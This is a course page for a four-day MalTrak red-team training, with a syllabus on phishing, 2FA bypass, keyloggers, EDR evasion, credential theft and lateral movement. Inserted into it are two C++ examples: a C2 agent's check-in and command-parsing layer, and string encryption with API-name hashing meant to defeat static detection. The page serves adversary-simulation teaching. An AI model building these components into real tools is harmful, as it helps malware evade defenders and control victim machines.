Advanced Red Teaming: Weaponization & Adversary Simulation
September 8-11, 2022 (4 Days Live Training)
This is a live, instructor-led training that focuses on developing cyber weapons that evade AV detection, EDR logging and forensic traces the way advanced targeted attacks do, and it provides insights into how to improve your organization's overall detection coverage and security posture.
Advanced Red Teaming: Weaponization & Adversary Simulation is a hands-on offensive training that helps organizations battle ever-growing targeted and ransomware attacks by simulating their adversaries, putting your defenses and your blue team to the test to improve the organization's security posture.

This training is for security professionals who want to expand their red teaming skills, understand what real-world attacks look like, and better protect their organizations against APT attacks, targeted ransomware attacks and fileless attacks.

  • Cyber Security Professionals
  • Penetration Testers
  • Purple Teamers & Threat Hunters
  • Incident Handlers
  • SOC Analysts

We help cybersecurity professionals protect their organizations from the biggest threats they face and become the go-to experts on their team.

The number of cyberattacks is undoubtedly on the rise, targeting government, military, public and private sectors.

These attacks target individuals or organizations in order to extract valuable information, extort money through ransom, or damage their reputation. 43% of the cyber attacks these organizations face are advanced malware, APT, or zero-day attacks.

With adversaries getting more sophisticated, the best way to test enterprise security operations and defenses against them is to simulate their attacks, leveraging the same tactics, techniques, and procedures (TTPs).

This intensive live training takes you on a journey into the attacker's mindset: we cover how to simulate real APT and ransomware attacks and how to bypass the organization's defenses and detection systems. We craft our own spear-phishing attacks, malicious documents, and undetectable cyber weapons to bypass those defenses and test the blue team's detections with real-world scenarios.

In this training we won't rely on commercial products; instead we use open-source projects and our in-house developed tools and weapons.

The strategies, skills, and tools required to simulate real targeted attacks and harden your organization's defenses and security teams
Day 1

APT Attacks & Red Team Infrastructure on AWS

  • What is an APT attack?
  • What are the attack stages, and what is MITRE ATT&CK?
  • APT attack lifecycle
  • Examples of real-world APT attacks
  • Deep dive into the attackers' tactics, techniques, and procedures (TTPs) using threat intelligence
  • Understand the attackers' malware arsenal
  • Setting up your infrastructure in the cloud
  • Setting up your account in AWS & Terraform
  • Build your network and Caldera VM in the cloud
  • Create redirectors to obfuscate your C&C IP

Phishing & Social Engineering Mastery

  • Create a phishing platform using GoPhish & Mailgun
  • Create your phishing pages using Evilginx2
  • Build your phishing plan using OSINT
  • Build your phishing email templates
  • Bypass 2-factor authentication using Evilginx2

Initial Access: Get your foot into the organization network

  • Spearphishing with malicious document
  • Spearphishing with link
  • Spearphishing using social media
  • Advanced Execution Techniques: LNK Files
  • Advanced Execution Techniques: COM Objects
  • Write your first spear-phishing attack with a malicious document (Hands-on)
Day 2

Write Your First HTTP Malware

  • Build a vulnerable organization in AWS
  • Connect to the Caldera C2 over HTTP
  • Implement Base64 encoding in your malware
  • Implement JSON parsing in your malware
  • Send victim machine information to your C&C
  • Receive and execute commands from Caldera
  • Automate command execution across multiple victims
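
As an added illustration of the Day 2 message flow (example code written for this page, not the course's agent and not Caldera's own code): the agent packs host details into a JSON object, Base64-wraps it for the HTTP body, decodes the server's Base64 reply and pulls out the commands to run. The field names, the extra Base64 layer around each command and the sample reply are assumptions made for this example; Caldera's real beacon schema is different and is not reproduced here. Networking is left out so the code runs offline: the caller would POST the string returned by beacon() and hand the HTTP response body to parse_instructions().

```cpp
// Added example for this page (not the course's agent, not Caldera code).
// ASSUMED wire format: one JSON object, Base64-wrapped, with illustrative
// field names; each command is Base64 inside the JSON. No networking: the
// caller POSTs beacon() and feeds the HTTP response body to parse_instructions().
#include <cstdint>
#include <iostream>
#include <string>
#include <utility>
#include <vector>

static const char* kB64 =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

// RFC 4648 Base64 with '=' padding; the 24-bit accumulator never overflows.
std::string b64encode(const std::string& in) {
    std::string out;
    uint32_t val = 0;
    int bits = -6;
    for (unsigned char c : in) {
        val = ((val << 8) | c) & 0xFFFFFF;
        bits += 8;
        while (bits >= 0) { out.push_back(kB64[(val >> bits) & 0x3F]); bits -= 6; }
    }
    if (bits > -6) out.push_back(kB64[((val << 8) >> (bits + 8)) & 0x3F]);
    while (out.size() % 4) out.push_back('=');
    return out;
}

std::string b64decode(const std::string& in) {
    int table[256];
    for (int& t : table) t = -1;
    for (int i = 0; i < 64; ++i) table[(unsigned char)kB64[i]] = i;
    std::string out;
    uint32_t val = 0;
    int bits = -8;
    for (unsigned char c : in) {
        if (table[c] == -1) break;          // '=' padding or junk ends the data
        val = ((val << 6) | table[c]) & 0xFFFFFF;
        bits += 6;
        if (bits >= 0) { out.push_back(char((val >> bits) & 0xFF)); bits -= 8; }
    }
    return out;
}

struct HostInfo { std::string host, user, platform; int pid; };

// Just enough escaping for host/user names; not a general JSON encoder.
std::string json_escape(const std::string& s) {
    std::string out;
    for (char c : s) { if (c == '"' || c == '\\') out.push_back('\\'); out.push_back(c); }
    return out;
}

// Check-in message: identifies the victim so the C2 can track it and queue work.
std::string beacon(const HostInfo& h) {
    std::string j = "{\"host\":\"" + json_escape(h.host) + "\",\"user\":\"" + json_escape(h.user) +
                    "\",\"platform\":\"" + json_escape(h.platform) +
                    "\",\"pid\":" + std::to_string(h.pid) + "}";
    return b64encode(j);
}

// Extract (id, command) pairs from the server reply. Commands are Base64 in the
// JSON so quotes or newlines inside them can never break the document, which is
// why a key-by-key scan is enough for this assumed format.
std::vector<std::pair<std::string, std::string>> parse_instructions(const std::string& body) {
    std::vector<std::pair<std::string, std::string>> out;
    const std::string json = b64decode(body);
    const std::string kId = "\"id\":\"", kCmd = "\"command\":\"";
    size_t pos = 0;
    while ((pos = json.find(kId, pos)) != std::string::npos) {
        size_t idStart = pos + kId.size(), idEnd = json.find('"', idStart);
        if (idEnd == std::string::npos) break;
        size_t cmdPos = json.find(kCmd, idEnd);
        if (cmdPos == std::string::npos) break;
        size_t cmdStart = cmdPos + kCmd.size(), cmdEnd = json.find('"', cmdStart);
        if (cmdEnd == std::string::npos) break;
        out.emplace_back(json.substr(idStart, idEnd - idStart),
                         b64decode(json.substr(cmdStart, cmdEnd - cmdStart)));
        pos = cmdEnd;
    }
    return out;
}

// Constructed sample reply standing in for the real server.
std::string sample_response() {
    return b64encode(std::string("{\"sleep\":5,\"instructions\":[") +
                     "{\"id\":\"1\",\"command\":\"" + b64encode("whoami") + "\"}," +
                     "{\"id\":\"2\",\"command\":\"" + b64encode("ipconfig /all") + "\"}]}");
}

int main() {
    std::cout << beacon({"WS01", "corp\\alice", "windows", 4321}) << "\n";
    for (const auto& ins : parse_instructions(sample_response()))
        std::cout << "instruction " << ins.first << ": " << ins.second << "\n";  // execute here
}
```

Base64 on its own is an encoding, not protection: anyone inspecting the traffic can decode it, which is why the Day 3 network obfuscation material layers encryption and HTTPS on top of this.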

Malware Plugin Framework Implementation

  • Add a framework for plugins with additional features
  • Add a keylogger plugin to log keystrokes and steal credentials.
  • Add commands for Caldera to download the keylogger logs

Maintaining Persistence In-Depth (Advanced Techniques)

  • Maintain persistence on the victim machine
  • Advanced persistence methods
  • Disguise the malware inside a legitimate process (malware as a DLL)
  • Persistence through DLL injection

Privilege Escalation Techniques

  • UAC bypass techniques
  • Advanced UAC bypass techniques: abusing application shimming
  • Abuse services for privilege escalation
  • Escalate to the SYSTEM account
Day 3

Defense Evasion: Malware Obfuscation

  • Malicious Documents: VBA Stomping
  • Strings Encryption
  • Dynamic API Loading
  • Hidden In Plain Sight: Malware Steganography
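
An added example of two of the obfuscation techniques listed above, in portable C++ so it builds anywhere (written for this page, not taken from the course material): sensitive strings such as the DLL name are XOR-encrypted during constant evaluation and decrypted only at the moment of use, and APIs are looked up by a ROR13 hash of their export name so the name itself is never stored in the binary. The export table here is a constructed array standing in for the real PE export directory, and the key 0x5A and the function names are illustrative choices.

```cpp
// Added example for this page (not course material): compile-time XOR strings
// plus API-name hashing, in portable C++. The export table is a constructed
// array standing in for the PE export directory; key 0x5A and the names are
// illustrative.
#include <cstddef>
#include <cstdint>
#include <iostream>
#include <string>

// Plaintext is XORed during constant evaluation, so only ciphertext bytes are
// stored; decrypt() rebuilds the string only when it is needed.
template <size_t N>
struct XorStr {
    char data[N] = {};
    uint8_t key;
    constexpr XorStr(const char (&s)[N], uint8_t k) : key(k) {
        for (size_t i = 0; i < N; ++i) data[i] = static_cast<char>(s[i] ^ k);
    }
    std::string decrypt() const {
        std::string out(N - 1, '\0');
        for (size_t i = 0; i + 1 < N; ++i) out[i] = static_cast<char>(data[i] ^ key);
        return out;
    }
};
template <size_t N>
constexpr XorStr<N> xs(const char (&s)[N], uint8_t k) { return XorStr<N>(s, k); }

// ROR13 over the export name, the hash classic shellcode uses for this job.
constexpr uint32_t ror13(const char* s) {
    uint32_t h = 0;
    for (; *s; ++s) h = ((h >> 13) | (h << 19)) + static_cast<uint8_t>(*s);
    return h;
}

// Only these constants reach the binary: an encrypted DLL name and a hash.
constexpr auto kLibName = xs("kernel32.dll", 0x5A);
constexpr uint32_t kVirtualAllocHash = ror13("VirtualAlloc");

// Constructed stand-in for a module's export table (real code walks the
// IMAGE_EXPORT_DIRECTORY of the module found via the PEB or GetModuleHandle).
struct Export { const char* name; void* addr; };
static int fakeCreateThread, fakeVirtualAlloc, fakeWriteProcessMemory;
static const Export kExports[] = {
    {"CreateThread", &fakeCreateThread},
    {"VirtualAlloc", &fakeVirtualAlloc},
    {"WriteProcessMemory", &fakeWriteProcessMemory},
};

// Compare hashes, never names: the wanted API is not visible to strings(1)
// or to a static import-table scan.
void* resolve_by_hash(uint32_t hash) {
    for (const Export& e : kExports)
        if (ror13(e.name) == hash) return e.addr;
    return nullptr;
}

int main() {
    std::string lib = kLibName.decrypt();  // decrypted only now, at use
    std::cout << "module: " << lib << "\n";
    std::cout << "VirtualAlloc resolved: "
              << (resolve_by_hash(kVirtualAllocHash) == &fakeVirtualAlloc) << "\n";
}
```

Check the result with strings(1) on the compiled binary: "kernel32.dll" and "VirtualAlloc" should be absent. Compilers are not obliged to drop a literal that was only consumed at compile time, so verify rather than assume; and note that the decrypted string does exist in memory briefly, which is exactly what memory-scanning EDRs look for.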

Defense Evasion: Network Obfuscation

  • Network Data Encryption
  • Hidden In Plain Sight 01: HTML Smuggling
  • Hidden In Plain Sight 02: Steganography
  • HTTPS Communication
  • Using legitimate websites for communications
  • Fast-flux DNS and DNS over HTTPS
  • Other Protocols & Channels (ICMP, DNS)

Defense Evasion: Bypass EDRs & Behavioral-Based Detection

  • Process Injection & DLL Injection
  • Sysmon & EDR Bypass Techniques
  • Unhook EDR APIs
  • Invisible Process Injection Without Alerting EDRs
  • AppLocker and Application Whitelisting Bypass Techniques
Day 4

Impersonating Users: Credential Theft & Token Impersonation

  • Credential theft using an LSASS memory dump
  • Bypass LSASS protection
  • Token impersonation & logon types overview
  • Token impersonation implementation in your malware
  • Steal Remote Desktop sessions
  • Lateral movement using Caldera and your agent

Lateral Movements

  • NTLM Attacks: Pass The Hash
  • Kerberos Attacks: Pass The Ticket
  • Kerberos Attacks: Overpass The Hash
  • Silver & Golden Tickets
  • Lateral movement using Scheduled Tasks
  • Lateral movement using Remote COM Objects
  • Lateral movement using WMIC & PowerShell Remoting
Your Trainers

Amr Thabet

Amr Thabet is a malware researcher and incident handler with over 10 years of experience; he has worked at Fortune 500 companies including Symantec and Tenable.

He is the founder of MalTrak and the author of "Mastering Malware Analysis", published by Packt Publishing.

Amr has spoken at top security conferences around the world, including DEF CON, Hack In Paris and the Virus Bulletin (VB) conference. He was also featured in The Christian Science Monitor for his work on Stuxnet.

His mission is to help security professionals around the world build their expertise in malware analysis, threat hunting and red teaming, and most importantly, protect their organizations' infrastructure from targeted attacks, ransomware attacks and APT attacks.
Muhammed Talaat
Muhammed Talaat is a Malware Researcher & Cybersecurity Consultant at CyShield. He has extensive experience in malware analysis, red teaming and custom malware development for different systems.

He has carried out multiple research projects on bypassing some of the top cybersecurity defenses, including Endpoint Detection and Response (EDR) products.

He has worked in the private sector on defensive strategies and malware research.

He specializes in reverse engineering low-level systems (firmware, ECUs, kernel projects, etc.) and has solid knowledge of the automotive security (car hacking) field.

WHAT are the prerequisites?
  • Good IT administration background, mainly in Windows (Linux also preferred)
  • Good cybersecurity background
  • Good programming skills in C++
  • Laptop with a minimum of 8GB RAM and 60GB free hard disk space
  • VMware Workstation or VMware Fusion (even trial versions can be used). You can use VirtualBox or other virtualization software; however, the training will be delivered based on VMware Workstation.
  • Delegates must have full administrator access to the Windows operating system installed inside VMware Workstation/Fusion.
  • Delegates must have Microsoft Visual Studio or the GNU C++ compiler installed on their machine, plus their preferred code editor (Visual Studio or VS Code are preferred).
Note: VMware Player is not suitable for this training.
WHAT materials are provided?
  • Training Prerequisite & Lab Setup Guide: a step-by-step guide to prepare your isolated virtualized environment for executing and analyzing malware
  • Malware Analysis Lab VM (Windows 7 VM) with all required tools pre-installed. It will be provided in .ova format
  • The labs/exercises samples and memory images
  • A printed copy of the Mastering Malware Analysis book
  • A printed copy of the Malware Analysis & Reverse Engineering Workbook, which includes all the exercises taught in the training with step-by-step solutions
HOW LONG IS THE TRAINING AND WHAT's the schedule like?
The training is a total of 4 days (6 hours of workshop/day). Each day will have a schedule that looks like the following:

11:00am : Workshop starts
2:00pm : Lunch
4:30pm : Afternoon tea break (15 mins)
6:00pm : Workshop ends (depends on the trainers)

18 Garnish Square, D15, Dublin, Ireland
©2020  MalTrak - All Rights Reserved.